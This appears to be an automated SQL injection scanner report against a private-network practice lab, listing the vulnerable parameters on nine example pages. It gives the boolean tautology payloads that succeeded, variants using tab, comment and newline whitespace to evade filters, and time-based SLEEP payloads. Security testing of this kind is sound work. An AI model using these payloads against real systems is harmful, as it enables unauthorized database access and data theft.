Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'55641'='55641
'	and	'10487'='10487
'	or	90488=90488#
'	and	'88898'='88899
Advice: 
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'55641'='55641
'	and	'10487'='10487
'	or	90488=90488#
'	and	'88898'='88899
Advice: 
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	84991=84991
	and	40228=40228
	or	62095=62095#
	and	19233=19234
Advice: 
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	84991=84991
	and	40228=40228
	or	62095=62095#
	and	19233=19234
Advice: 
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	84991=84991
	and	40228=40228
	or	62095=62095#
	and	19233=19234
Advice: 
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '/**/and/**/'41505'='41505
'/**/and/**/'34587'='34587
'/**/or/**/28585=28585#
'/**/and/**/'73101'='73102
Advice: 
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 
and
25262=25262

and
10214=10214

or
56984=56984#

and
46900=46901
Advice: 
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: 
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: 
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: 
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: 
---